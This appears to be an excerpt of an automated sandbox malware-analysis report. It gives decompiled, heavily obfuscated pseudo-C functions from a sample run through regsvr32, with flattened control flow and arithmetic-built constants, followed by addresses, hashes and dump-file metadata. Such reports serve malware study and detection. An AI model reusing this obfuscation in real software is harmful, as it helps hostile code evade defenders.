						_v100 = _v100 ^ 0x08bd7186;
						_v100 = _v100 * 0x1b;
						_v100 = _v100 ^ 0xf2800db4;
						_v108 = 0x70f246;
						_t271 = 7;
						_v108 = _v108 / _t270;
						_v108 = _v108 / _t271;
						_v108 = _v108 ^ 0x000ccb9b;
						_v104 = 0x17e0a1;
						_v104 = _v104 ^ 0x9b070632;
						_v104 = _v104 ^ 0x1e01d164;
						_v104 = _v104 ^ 0x85107007;
						_t251 = E003D86C1(_v96, _v100, _v108,  &_v92, _v104,  &_v84);
						_t311 = _t311 + 0x10;
						__eflags = _t251;
						if(__eflags == 0) {
							L8:
							return _t304;
						}
						_t227 = 0x5642f;
						continue;
					}
					if(_t227 == 0x5642f) {
						_v108 = 0xc79000;
						_v108 = _v108 >> 0x10;
						_v108 = _v108 ^ 0x043f1c39;
						_v108 = _v108 ^ 0x0435d04a;
						_v104 = 0xc3e09e;
						_v104 = _v104 >> 0xa;
						_v104 = _v104 << 6;
						_v104 = _v104 ^ 0x00053c8e;
						_t253 = E003DF6AE( &_v84, _v108, _v104,  &_v64);
						asm("sbb eax, eax");
						_t227 = ( ~_t253 & 0xfff1a420) + _t306;
						continue;
					}
					if(_t227 == 0x5c584) {
						_v92 =  *_t309;
						_v88 = _a4;
						_v108 = 0x9f1b27;
						_v108 = _v108 + 0xffff752d;
						_v108 = _v108 + 0xffffc4d4;
						_v108 = _v108 | 0xc7ffe64d;
						_v108 = _v108 ^ 0xc7fff76c;
						_t278 = _v92 + _v88 - _v108;
						while(1) {
							__eflags = _t278 - _v92;
							if(_t278 <= _v92) {
								break;
							}
							__eflags =  *_t278;
							if( *_t278 == 0) {
								break;
							}
							_t278 = _t278 - 1;
							__eflags = _t278;
						}
						_t279 = _t278 - _v92;
						__eflags = _t279;
						_v88 = _t279;
						if(__eflags == 0) {
							L18:
							_t227 = 0x3bf0d;
							continue;
						} else {
							goto L15;
						}
						while(1) {
							L15:
							_v104 = 0x5ddd8;
							_v104 = _v104 + 0xffffb575;
							_v104 = _v104 * 0x29;
							_v104 = _v104 ^ 0x00e49745;
							_t307 = _v88;
							__eflags = _t307 % _v104;
							if(__eflags == 0) {
								break;
							}
							_t308 = _t307 - 1;
							__eflags = _t308;
							_v88 = _t308;
							if(__eflags != 0) {
								continue;
							}
							break;
						}
						_t306 = 0xeda46;
						goto L18;
					}
					if(_t227 == 0xa455e) {
						_t227 = 0x5c584;
						continue;
					}
					if(_t227 != _t306) {
						L26:
						__eflags = _t227 - 0xa876d;
						if(__eflags != 0) {
							continue;
						}
						goto L8;
					}
					_v108 = 0x90f852;
					_t280 = 0x4b;
					_v108 = _v108 / _t280;
					_v108 = _v108 ^ 0x000bf6d7;
					_v100 = 0x15482d;
					_v100 = _v100 + 0xffff3239;
					_v100 = _v100 ^ 0x0014f7c2;
					_v96 = 0x9a3f0c;
					_v96 = _v96 ^ 0xdc4dce20;
					_v96 = _v96 + 0x84d7;
					_v96 = _v96 ^ 0xdcd6b38b;
					_v104 = 0xa297bd;
					_v104 = _v104 + 0x589a;
					_v104 = _v104 << 0xb;
					_v104 = _v104 ^ 0x08cff43e;
					_v104 = _v104 ^ 0x1f40c9bb;
					E003C79D0(_v108, _v100, _v104, _v96, _v84, _v104);
					goto L8;
				}
				_v100 = 0x4527f3;
				_v100 = _v100 * 0x15;
				_v100 = _v100 + 0xffff2d6b;
				_v100 = _v100 ^ 0x05ad2c61;
				_v108 = 0xe8cd1d;
				_v108 = _v108 + 0xffff5f50;
				_v108 = _v108 | 0xa8b87d98;
				_v108 = _v108 + 0xffff737d;
				_v108 = _v108 ^ 0xa8f00b59;
				_t230 = E003DA1B1( &_v56, _v100, _v108,  &_v28);
				_pop(_t269);
				__eflags = _t230;
				if(__eflags != 0) {
					_v104 = 0x46fe07;
					_v104 = _v104 ^ 0x9192d6ed;
					_v104 = _v104 + 0xd1a7;
					_v104 = _v104 | 0x0140d6a6;
					_v104 = _v104 ^ 0x91dd5ea6;
					_v100 = 0x2f4bd0;
					_v100 = _v100 + 0x3f06;
					_push(_t269);
					_push(_t269);
					_v100 = _v100 * 0x19;
					_v100 = _v100 ^ 0x04a36b57;
					_v108 = 0xab09b1;
					_v108 = _v108 << 6;
					_v108 = _v108 ^ 0x130dc08a;
					_v108 = _v108 * 0x70;
					_v108 = _v108 ^ 0x4ad3f646;
					_t237 = E003C8D52(_t269, _v24, __eflags);
					 *_t265 = _t237;
					__eflags = _t237;
					if(_t237 != 0) {
						_v108 = 0x35c893;
						_t285 = 0x44;
						_v108 = _v108 / _t285;
						_v108 = _v108 * 0x5f;
						_v108 = _v108 << 0xd;
						_v108 = _v108 ^ 0x6460d28c;
						_v96 = 0xbed027;
						_v96 = _v96 << 0xe;
						_v96 = _v96 ^ 0xcdd6cf3f;
						_v96 = _v96 ^ 0x79da7d64;
						_v100 = 0x82be90;
						_v100 = _v100 << 6;
						_v100 = _v100 | 0x253dcbbe;
						_v100 = _v100 ^ 0x25b06ac5;
						_v104 = 0x2a8d5e;
						_v104 = _v104 | 0x153b2d6c;
						_v104 = _v104 << 0xf;
						_v104 = _v104 + 0x1345;
						_v104 = _v104 ^ 0xd6bb7d71;
						E003DF4FB(_v108, _v28, _v96,  *_t265, _v100, _v24, _v104);
						_t311 = _t311 + 0x14;
						_t265[1] = _v24;
						_t304 = 1;
						__eflags = 1;
					}
				}
				_t227 = _t306;
				goto L26;
			}

0x003cd0fc
0x003cd103
0x003cd107
0x003cd108
0x003cd10f
0x003cd116
0x003cd117
0x003cd118
0x003cd11d
0x003cd120
0x003cd128
0x003cd12a
0x003cd132
0x003cd137
0x003cd13b
0x003cd140
0x003cd150
0x003cd32f
0x003cd340
0x003cd343
0x003cd347
0x003cd34f
0x003cd357
0x003cd364
0x003cd368
0x003cd370
0x003cd37e
0x003cd37f
0x003cd38b
0x003cd393
0x003cd39b
0x003cd3a3
0x003cd3ab
0x003cd3b3
0x003cd3d1
0x003cd3d6
0x003cd3d9
0x003cd3db
0x003cd217
0x003cd220
0x003cd220
0x003cd3e1
0x00000000
0x003cd3e1
0x003cd15b
0x003cd2d0
0x003cd2dc
0x003cd2e5
0x003cd2ed
0x003cd2f5
0x003cd2fd
0x003cd302
0x003cd307
0x003cd318
0x003cd320
0x003cd328
0x00000000
0x003cd328
0x003cd166
0x003cd22e
0x003cd235
0x003cd239
0x003cd241
0x003cd249
0x003cd251
0x003cd259
0x003cd26d
0x003cd277
0x003cd277
0x003cd27b
0x00000000
0x00000000
0x003cd271
0x003cd274
0x00000000
0x00000000
0x003cd276
0x003cd276
0x003cd276
0x003cd27d
0x003cd27d
0x003cd281
0x003cd285
0x003cd2c6
0x003cd2c6
0x00000000
0x00000000
0x00000000
0x00000000
0x003cd287
0x003cd287
0x003cd287
0x003cd291
0x003cd29e
0x003cd2a2
0x003cd2ae
0x003cd2b6
0x003cd2b8
0x00000000
0x00000000
0x003cd2ba
0x003cd2ba
0x003cd2bb
0x003cd2bf
0x00000000
0x00000000
0x00000000
0x003cd2bf
0x003cd2c1
0x00000000
0x003cd2c1
0x003cd171
0x003cd221
0x00000000
0x003cd221
0x003cd179
0x003cd5a0
0x003cd5a0
0x003cd5a5
0x00000000
0x00000000
0x00000000
0x003cd5ab
0x003cd17f
0x003cd18f
0x003cd192
0x003cd196
0x003cd19e
0x003cd1a6
0x003cd1ae
0x003cd1b6
0x003cd1be
0x003cd1c6
0x003cd1ce
0x003cd1d6
0x003cd1de
0x003cd1e6
0x003cd1eb
0x003cd1f3
0x003cd20f
0x00000000
0x003cd214
0x003cd3eb
0x003cd3fc
0x003cd404
0x003cd40c
0x003cd414
0x003cd41c
0x003cd424
0x003cd42c
0x003cd434
0x003cd445
0x003cd44b
0x003cd44c
0x003cd44e
0x003cd454
0x003cd45c
0x003cd464
0x003cd46c
0x003cd474
0x003cd47c
0x003cd484
0x003cd491
0x003cd492
0x003cd493
0x003cd497
0x003cd49f
0x003cd4a7
0x003cd4ac
0x003cd4b9
0x003cd4bd
0x003cd4d5
0x003cd4da
0x003cd4de
0x003cd4e0
0x003cd4e6
0x003cd4f6
0x003cd4f9
0x003cd502
0x003cd506
0x003cd50b
0x003cd513
0x003cd51b
0x003cd520
0x003cd528
0x003cd530
0x003cd538
0x003cd53d
0x003cd545
0x003cd54d
0x003cd555
0x003cd55d
0x003cd562
0x003cd56a
0x003cd58c
0x003cd597
0x003cd59a
0x003cd59d
0x003cd59d
0x003cd59d
0x003cd4e0
0x003cd59e
0x00000000

Strings

^E, xrefs: 003CD132
^E, xrefs: 003CD16C

Memory Dump Source

Source File: 00000003.00000002.464950285.00000000003C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000003.00000002.464941185.00000000003C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.464992033.00000000003E2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3c0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: ^E$^E
API String ID: 0-3742017383
Opcode ID: 39694ac4771b3e001471a22c7d873ff41299b2e1b5ec156ec091a6585f72ebff
Instruction ID: c7d7c5d0aa8aa0dbbd4829abfbb947bcebde3aee25340fd32372ff6b396c0527
Opcode Fuzzy Hash: 39694ac4771b3e001471a22c7d873ff41299b2e1b5ec156ec091a6585f72ebff
Instruction Fuzzy Hash: 01C131715083028FD359CF25D98991BBBE0FBD8748F108A2EF499A6261D774DA098F93

Uniqueness

Uniqueness Score: -1.00%

Function 003DB1BA Relevance: 2.7, Strings: 2, Instructions: 243
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E003DB1BA(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v52;
				intOrPtr _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				void* _t211;
				void* _t213;
				signed int _t225;
				signed int _t229;
				signed int _t244;
				void* _t248;
				signed int _t251;
				signed int _t252;
				signed int _t254;
				signed int _t257;
				signed int _t258;
				signed int _t259;
				signed int _t263;
				signed int _t265;
				void* _t290;
				void* _t291;
				signed int* _t294;

				_push(_a12);
				_t291 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E003C2528(_t211);
				_t294 =  &(( &_v72)[5]);
				_v60 = 0xf28fe;
				_t290 = 0;
				_v56 = 0x7930f;
				_t213 = 0x4908b;
				while(_t213 != 0x17c39) {
					if(_t213 == 0x1e585) {
						_v68 = 0xc8fcb;
						_t254 = 0xe;
						_v68 = _v68 * 0xe;
						_v68 = _v68 / _t254;
						_v68 = _v68 ^ 0x000cd115;
						_v64 = 0x188719;
						_v64 = _v64 + 0x6dd9;
						_v64 = _v64 << 4;
						_v64 = _v64 ^ 0x018b25a7;
						_v60 = 0xc09628;
						_v60 = _v60 << 0xa;
						_v60 = _v60 ^ 0x02572c2c;
						_t225 = E003CD706(_v68, _v64, _v60,  &_v52, _t291 + 0x28);
						_t294 =  &(_t294[3]);
						__eflags = _t225;
						if(__eflags != 0) {
							_t213 = 0x27689;
							continue;
						}
					} else {
						if(_t213 == 0x27689) {
							_v72 = 0xf04d31;
							_v72 = _v72 + 0xffff312a;
							_v72 = _v72 * 0x46;
							_v72 = _v72 + 0xfffff21c;
							_v72 = _v72 ^ 0x417ac6dd;
							_v64 = 0x26c178;
							_v64 = _v64 >> 4;
							_v64 = _v64 + 0xffff4452;
							_v64 = _v64 ^ 0x000c82c7;
							_v60 = 0x7ce5d1;
							_v60 = _v60 | 0x9c72d6b8;
							_v60 = _v60 ^ 0x9c75f078;
							_t229 = E003CD706(_v72, _v64, _v60,  &_v52, _t291 + 4);
							_t294 =  &(_t294[3]);
							__eflags = _t229;
							if(__eflags != 0) {
								_t213 = 0x67389;
								continue;
							}
						} else {
							if(_t213 == 0x4908b) {
								_t213 = 0x17c39;
								continue;
							} else {
								if(_t213 == 0x67389) {
									_v64 = 0x1797c1;
									_t257 = 0x4a;
									_v64 = _v64 * 0x2f;
									_v64 = _v64 >> 4;
									_v64 = _v64 + 0xffff3c9e;
									_v64 = _v64 ^ 0x004226ec;
									_v72 = 0x7c1bea;
									_t258 = 0x72;
									_v72 = _v72 / _t257;
									_v72 = _v72 << 0xe;
									_v72 = _v72 / _t258;
									_v72 = _v72 ^ 0x00fa8aa0;
									_v60 = 0xff21fe;
									_v60 = _v60 << 0x10;
									_v60 = _v60 ^ 0x21f5a1f9;
									_v68 = 0xa59ac7;
									_t259 = 0x56;
									_v68 = _v68 / _t259;
									_v68 = _v68 + 0xffff3c19;
									_v68 = _v68 | 0x6e933f78;
									_v68 = _v68 ^ 0x6e99b644;
									__eflags = E003D833B(_v64, _v72, __eflags, _v60, _v68,  &_v52, _t291 + 0x14);
									_t290 =  !=  ? 1 : _t290;
								} else {
									if(_t213 == 0x75e1c) {
										_v64 = 0x6cc6ff;
										_t263 = 0x7e;
										_v64 = _v64 / _t263;
										_v64 = _v64 >> 8;
										_v64 = _v64 ^ 0x00038c60;
										_v60 = 0x4d1bec;
										_v60 = _v60 >> 6;
										_v60 = _v60 ^ 0x0003411f;
										_v72 = 0x1adf3c;
										_v72 = _v72 | 0x7d754fde;
										_v72 = _v72 >> 6;
										_v72 = _v72 ^ 0x01fba393;
										_t244 = E003CD706(_v64, _v60, _v72,  &_v52, _t291 + 8);
										_t294 =  &(_t294[3]);
										__eflags = _t244;
										if(__eflags != 0) {
											_t213 = 0x7fdca;
											continue;
										}
									} else {
										if(_t213 != 0x7fdca) {
											L18:
											__eflags = _t213 - 0x232fe;
											if(__eflags != 0) {
												continue;
											} else {
											}
										} else {
											_v72 = 0xc184fa;
											_v72 = _v72 + 0xffffbb99;
											_v72 = _v72 >> 4;
											_v72 = _v72 | 0xf78928f0;
											_v72 = _v72 ^ 0xf78e63cb;
											_v64 = 0x2f17b6;
											_v64 = _v64 ^ 0x061c712b;
											_v64 = _v64 ^ 0x063a6fee;
											_v60 = 0xa74b6b;
											_t265 = 0x53;
											_v60 = _v60 / _t265;
											_v60 = _v60 ^ 0x000d88b9;
											_t248 = E003CD706(_v72, _v64, _v60,  &_v52, _t291);
											_t294 =  &(_t294[3]);
											if(_t248 != 0) {
												_t213 = 0x1e585;
												continue;
											}
										}
									}
								}
							}
						}
					}
					return _t290;
				}
				_v60 = 0xf0c693;
				_t251 = 0x2a;
				_v60 = _v60 / _t251;
				_t252 = 0x1a;
				_v60 = _v60 / _t252;
				_v60 = _v60 ^ 0x00014deb;
				_v64 = 0x6f99ed;
				_v64 = _v64 + 0xffffdada;
				_v64 = _v64 + 0xffff1710;
				_v64 = _v64 ^ 0x0060ee8d;
				_v68 = 0xec2b63;
				_v68 = _v68 << 0xb;
				_v68 = _v68 << 7;
				_v68 = _v68 + 0xcf51;
				_v68 = _v68 ^ 0xad8ec4b2;
				_v72 = 0x35efb8;
				_v72 = _v72 + 0xffff050e;
				_v72 = _v72 + 0xffffcd4f;
				_v72 = _v72 ^ 0xd7d6c320;
				_t154 =  &_v72;
				 *_t154 = _v72 ^ 0xd7e9182d;
				__eflags =  *_t154;
				E003CAE19( &_v52, _v60, _a12, _v64, _v68, _v72);
				_t294 =  &(_t294[4]);
				_t213 = 0x75e1c;
				goto L18;
			}

0x003db1c1
0x003db1c5
0x003db1c7
0x003db1cb
0x003db1cf
0x003db1d0
0x003db1d1
0x003db1d6
0x003db1d9
0x003db1e1
0x003db1e3
0x003db1eb
0x003db1fa
0x003db204
0x003db3df
0x003db3f0
0x003db3f1
0x003db3fb
0x003db402
0x003db40a
0x003db412
0x003db41a
0x003db41f
0x003db427
0x003db42f
0x003db434
0x003db44e
0x003db453
0x003db456
0x003db458
0x003db45e
0x00000000
0x003db45e
0x003db20a
0x003db20f
0x003db352
0x003db35a
0x003db367
0x003db36e
0x003db376
0x003db37e
0x003db386
0x003db38b
0x003db393
0x003db39b
0x003db3a3
0x003db3ab
0x003db3c5
0x003db3ca
0x003db3cd
0x003db3cf
0x003db3d5
0x00000000
0x003db3d5
0x003db215
0x003db21a
0x003db34b
0x00000000
0x003db220
0x003db225
0x003db535
0x003db546
0x003db549
0x003db54d
0x003db552
0x003db55a
0x003db562
0x003db570
0x003db571
0x003db577
0x003db584
0x003db58a
0x003db592
0x003db59a
0x003db59f
0x003db5a7
0x003db5b3
0x003db5b6
0x003db5bd
0x003db5c5
0x003db5cd
0x003db5f6
0x003db5f8
0x003db22b
0x003db230
0x003db2c6
0x003db2d6
0x003db2d9
0x003db2e0
0x003db2e5
0x003db2ed
0x003db2f5
0x003db2fa
0x003db302
0x003db30a
0x003db312
0x003db317
0x003db331
0x003db336
0x003db339
0x003db33b
0x003db341
0x00000000
0x003db341
0x003db236
0x003db23b
0x003db525
0x003db525
0x003db52a
0x00000000
0x00000000
0x003db530
0x003db241
0x003db241
0x003db24b
0x003db253
0x003db258
0x003db260
0x003db268
0x003db270
0x003db278
0x003db280
0x003db28e
0x003db292
0x003db29a
0x003db2af
0x003db2b4
0x003db2b9
0x003db2bf
0x00000000
0x003db2bf
0x003db2b9
0x003db23b
0x003db230
0x003db225
0x003db21a
0x003db20f
0x003db604
0x003db604
0x003db468
0x003db478
0x003db47d
0x003db487
0x003db48e
0x003db492
0x003db49a
0x003db4a2
0x003db4aa
0x003db4b2
0x003db4ba
0x003db4c2
0x003db4c7
0x003db4cc
0x003db4d4
0x003db4dc
0x003db4e4
0x003db4ec
0x003db4f4
0x003db4fc
0x003db4fc
0x003db4fc
0x003db518
0x003db51d
0x003db520
0x00000000

Strings

c+, xrefs: 003DB4BA
&B, xrefs: 003DB55A

Memory Dump Source

Source File: 00000003.00000002.464950285.00000000003C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000003.00000002.464941185.00000000003C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.464992033.00000000003E2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3c0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: c+$&B
API String ID: 0-1540725402
Opcode ID: 282adac947e14a65001ae92e4e667133db0c67c4f792f088732e255810fe4580
Instruction ID: 8ca404fb4fa3de2b2c63040839934ca6366f83772cc5dbe6ab2abb4c1b38dd05
Opcode Fuzzy Hash: 282adac947e14a65001ae92e4e667133db0c67c4f792f088732e255810fe4580
Instruction Fuzzy Hash: 8FB122725083428BD305CF25E94981BBBE5FBD8348F104A2EF59A96261D7B4DA4DCF83

Uniqueness

Uniqueness Score: -1.00%

Function 003D75E7 Relevance: 2.7, Strings: 2, Instructions: 209
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E003D75E7(signed int __ecx) {
				signed int _v4;
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void* _t180;
				void* _t183;
				void* _t190;
				void* _t194;
				void* _t200;
				void* _t209;
				void* _t215;
				signed int _t219;
				signed int _t220;
				signed int _t221;
				signed int _t222;
				signed int _t239;
				signed int _t242;
				signed int* _t247;
				void* _t250;

				_t219 = __ecx;
				_t247 =  &_v32;
				_v8 = _v8 & 0x00000000;
				_t180 = 0xfd440;
				_v4 = _v4 & 0x00000000;
				_t242 = _v20;
				_v16 = 0x2eabd;
				_t239 = __ecx;
				_v12 = 0xc9443;
				goto L1;
				do {
					while(1) {
						L1:
						_t250 = _t180 - 0xe6876;
						if(_t250 > 0) {
							break;
						}
						if(_t250 == 0) {
							_v24 = 0xdc3efb;
							_v24 = _v24 + 0x6caa;
							_v24 = _v24 ^ 0x00dd1558;
							_v20 = 0xbeca2a;
							_push(_t219);
							_v20 = _v20 * 9;
							_v20 = _v20 ^ 0x06bdf854;
							_t194 = E003C87EC();
							_t247 =  &(_t247[1]);
							_t242 = _t242 + _t194;
							_t180 = 0xf55c1;
							continue;
						} else {
							if(_t180 == 0x6b49) {
								_v32 = 0xe6d959;
								_v32 = _v32 + 0xffffd922;
								_v32 = _v32 | 0xb356b7ea;
								_v32 = _v32 ^ 0xb3f835ab;
								_v28 = 0x6aab6c;
								_t219 = 0x74;
								_push(_t219);
								_v28 = _v28 / _t219;
								_v28 = _v28 ^ 0x678e3b7e;
								_v28 = _v28 * 0x7a;
								_v28 = _v28 ^ 0x5a0b52a9;
								_t200 = E003C87EC();
								_t247 =  &(_t247[1]);
								_t242 = _t242 + _t200;
								_t180 = 0x2b854;
								continue;
							} else {
								if(_t180 == 0x2b854) {
									_v20 = 0x3d50d9;
									_v20 = _v20 + 0xffff31f9;
									_t222 = 0x6d;
									_v20 = _v20 / _t222;
									_v20 = _v20 ^ 0x000f6056;
									_v32 = 0x915180;
									_v32 = _v32 << 3;
									_v32 = _v32 + 0xffff9fc9;
									_v32 = _v32 ^ 0x0481fd39;
									_v28 = 0x9bdf3c;
									_v28 = _v28 | 0x5960061f;
									_v28 = _v28 << 7;
									_v28 = _v28 ^ 0xfde07cc4;
									_v24 = 0x7b29f1;
									_v24 = _v24 * 0x57;
									_v24 = _v24 + 0xffff383d;
									_v24 = _v24 ^ 0x29d20d3b;
									_t242 = _t242 + E003D9E05(_v20, _t239 + 4, _v32, _v28, _v24);
								} else {
									if(_t180 == 0x3d70f) {
										_v28 = 0x5b79b3;
										_v28 = _v28 | 0x6b2437e0;
										_t31 =  &_v28; // 0x6b2437e0
										_t219 = 0x5c;
										_push(_t219);
										_v28 =  *_t31 / _t219;
										_v28 = _v28 << 9;
										_v28 = _v28 ^ 0x563846eb;
										_v32 = 0x7806b9;
										_v32 = _v32 + 0xffff9413;
										_v32 = _v32 >> 8;
										_v32 = _v32 + 0xffff4721;
										_v32 = _v32 ^ 0xfff42fab;
										_t209 = E003C87EC();
										_t247 =  &(_t247[1]);
										_t242 = _t242 + _t209;
										_t180 = 0x565a2;
										continue;
									} else {
										if(_t180 != 0x565a2) {
											goto L17;
										} else {
											_v32 = 0xc2486d;
											_v32 = _v32 ^ 0xae30b1c3;
											_t219 = 0x58;
											_push(_t219);
											_v32 = _v32 / _t219;
											_v32 = _v32 ^ 0xf9852034;
											_v32 = _v32 ^ 0xf87ecfc8;
											_v20 = 0x663082;
											_v20 = _v20 * 0x11;
											_v20 = _v20 ^ 0x06cc9b88;
											_t215 = E003C87EC();
											_t247 =  &(_t247[1]);
											_t242 = _t242 + _t215;
											_t180 = 0x6b49;
											continue;
										}
									}
								}
							}
						}
						L20:
						return _t242;
					}
					if(_t180 == 0xf55c1) {
						_v28 = 0xeaff8;
						_v28 = _v28 << 5;
						_v28 = _v28 << 0xf;
						_v28 = _v28 + 0x353d;
						_v28 = _v28 ^ 0xff8a5ae3;
						_v20 = 0xeca075;
						_v20 = _v20 ^ 0x7c6866a6;
						_v20 = _v20 ^ 0x7c864b26;
						_push(_t219);
						_t183 = E003C87EC();
						_t247 =  &(_t247[1]);
						_t242 = _t242 + _t183;
						_t180 = 0x3d70f;
						goto L17;
					} else {
						if(_t180 == 0xf7555) {
							_v32 = 0xb46044;
							_t220 = 0x77;
							_v32 = _v32 / _t220;
							_v32 = _v32 | 0xddffdf7b;
							_v32 = _v32 ^ 0xddfbcb89;
							_v28 = 0x620b98;
							_v28 = _v28 << 5;
							_v28 = _v28 + 0xffffbb8b;
							_t221 = 0x1d;
							_v28 = _v28 * 0x2b;
							_v28 = _v28 ^ 0x0ef7c85e;
							_v20 = 0xabdf24;
							_v20 = _v20 / _t221;
							_v20 = _v20 ^ 0x0009cba3;
							_v24 = 0x5f95bf;
							_v24 = _v24 ^ 0x702ae12c;
							_v24 = _v24 << 0xf;
							_v24 = _v24 ^ 0xba49bd70;
							_t219 = _v32;
							_t190 = E003D9E05(_t219, _t239 + 0x10, _v28, _v20, _v24);
							_t247 =  &(_t247[3]);
							_t242 = _t242 + _t190;
							_t180 = 0xe6876;
							goto L1;
						} else {
							if(_t180 != 0xfd440) {
								goto L17;
							} else {
								_t242 = 0;
								_t180 = 0xf7555;
								goto L1;
							}
						}
					}
					goto L20;
					L17:
				} while (_t180 != 0xe2ce7);
				goto L20;
			}

0x003d75e7
0x003d75e7
0x003d75ea
0x003d75ef
0x003d75f4
0x003d75fc
0x003d7606
0x003d760e
0x003d7610
0x003d7618
0x003d761d
0x003d761d
0x003d761d
0x003d761d
0x003d761f
0x00000000
0x00000000
0x003d7625
0x003d7793
0x003d779b
0x003d77a3
0x003d77ab
0x003d77b8
0x003d77b9
0x003d77bd
0x003d77cd
0x003d77d2
0x003d77d5
0x003d77d7
0x00000000
0x003d762b
0x003d7630
0x003d7726
0x003d7730
0x003d7738
0x003d7740
0x003d7748
0x003d7756
0x003d7759
0x003d775a
0x003d775e
0x003d776b
0x003d776f
0x003d777f
0x003d7784
0x003d7787
0x003d7789
0x00000000
0x003d7636
0x003d763b
0x003d7913
0x003d791d
0x003d792b
0x003d7931
0x003d7935
0x003d793d
0x003d7945
0x003d794a
0x003d7952
0x003d795a
0x003d7962
0x003d796a
0x003d796f
0x003d7977
0x003d7984
0x003d7988
0x003d7990
0x003d79b0
0x003d7641
0x003d7646
0x003d76b8
0x003d76c2
0x003d76ca
0x003d76d0
0x003d76d3
0x003d76d4
0x003d76d8
0x003d76dd
0x003d76e5
0x003d76ed
0x003d76f5
0x003d76fa
0x003d7702
0x003d7712
0x003d7717
0x003d771a
0x003d771c
0x00000000
0x003d7648
0x003d764d
0x00000000
0x003d7653
0x003d7653
0x003d765d
0x003d766b
0x003d766e
0x003d766f
0x003d7673
0x003d767b
0x003d7683
0x003d7690
0x003d7694
0x003d76a4
0x003d76a9
0x003d76ac
0x003d76ae
0x00000000
0x003d76ae
0x003d764d
0x003d7646
0x003d763b
0x003d7630
0x003d79b2
0x003d79bb
0x003d79bb
0x003d77e6
0x003d78b1
0x003d78b9
0x003d78be
0x003d78c3
0x003d78cb
0x003d78d3
0x003d78db
0x003d78e3
0x003d78f3
0x003d78f4
0x003d78f9
0x003d78fc
0x003d78fe
0x00000000
0x003d77ec
0x003d77ee
0x003d7804
0x003d7814
0x003d7819
0x003d781f
0x003d7827
0x003d782f
0x003d7837
0x003d783c
0x003d7849
0x003d784a
0x003d784e
0x003d7856
0x003d7867
0x003d786b
0x003d7873
0x003d787b
0x003d7883
0x003d7888
0x003d789c
0x003d78a0
0x003d78a5
0x003d78a8
0x003d78aa
0x00000000
0x003d77f0
0x003d77f5
0x00000000
0x003d77fb
0x003d77fb
0x003d77fd
0x00000000
0x003d77fd
0x003d77f5
0x003d77ee
0x00000000
0x003d7903
0x003d7903
0x00000000

Strings

,*p, xrefs: 003D787B
7$k, xrefs: 003D76CA

Memory Dump Source

Source File: 00000003.00000002.464950285.00000000003C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000003.00000002.464941185.00000000003C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.464992033.00000000003E2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3c0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: ,*p$7$k
API String ID: 0-3146132557
Opcode ID: ac1b614552ff5c8e2c57d219fe4c0245ad646647a3dfea790b46512f8df85f14
Instruction ID: 15ccfca6feec2bd95f4652fdf5848b8cb4636c25926083bcd49ac107322979f9
Opcode Fuzzy Hash: ac1b614552ff5c8e2c57d219fe4c0245ad646647a3dfea790b46512f8df85f14
Instruction Fuzzy Hash: 099133B29083028BC315CF25E88A51BBBE1BBE4744F114D2EF49596261E3B4DA5D8FD3

Uniqueness

Uniqueness Score: -1.00%

Function 003D7CA5 Relevance: 2.7, Strings: 2, Instructions: 186
COMMONCrypto

Download Yara Rule

C-Code - Quality: 69%

			E003D7CA5(intOrPtr* __ecx, void* __edx) {
				signed int _v4;
				signed int _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t171;
				signed int _t179;
				intOrPtr* _t188;
				signed int _t194;
				signed int _t195;
				signed int _t197;
				signed int _t200;
				void* _t218;
				void* _t221;
				signed int* _t227;
				signed int* _t229;

				_t227 =  &_v28;
				_v8 = _v8 & 0x00000000;
				_v4 = _v4 & 0x00000000;
				_t218 = __edx;
				_v12 = 0x36969;
				_t188 = __ecx;
				_t221 = 0xf2e87;
				while(1) {
					L1:
					_t171 = 0x6492d;
					do {
						L2:
						while(_t221 != 0x63bb8) {
							if(_t221 == _t171) {
								_v20 = 0x623598;
								_v20 = _v20 ^ 0x9dc6dc7a;
								_v20 = _v20 ^ 0x9da3cbfa;
								_v24 = 0x1ae245;
								_v24 = _v24 | 0xa52288f0;
								_v24 = _v24 >> 1;
								_v24 = _v24 ^ 0xe037c02d;
								_v24 = _v24 ^ 0xb2a73642;
								_v28 = 0xb30989;
								_v28 = _v28 + 0x42c0;
								_t194 = 0x73;
								_v28 = _v28 / _t194;
								_v28 = _v28 ^ 0x0006dd4b;
								_v16 = 0xc92d6f;
								_v16 = _v16 * 0x27;
								_v16 = _v16 ^ 0x1eab3078;
								_push(_v16);
								_push(_v28);
								_push(_v24);
								_push(_v20);
								_push(_t218);
								_t171 = E003CE7C3(_t194, E003DE4E3);
								_t227 = _t227 - 0xc + 0x20;
								 *(_t218 + 0x30) = _t171;
								__eflags = _t171;
								if(__eflags == 0) {
									_t221 = 0x63bb8;
									goto L1;
								}
							} else {
								if(_t221 == 0xa24b6) {
									_v28 = 0xb9624b;
									_v28 = _v28 << 1;
									_v28 = _v28 << 0xe;
									_v28 = _v28 ^ 0xb12c38c1;
									_v16 = 0x63703e;
									_v16 = _v16 + 0x1b89;
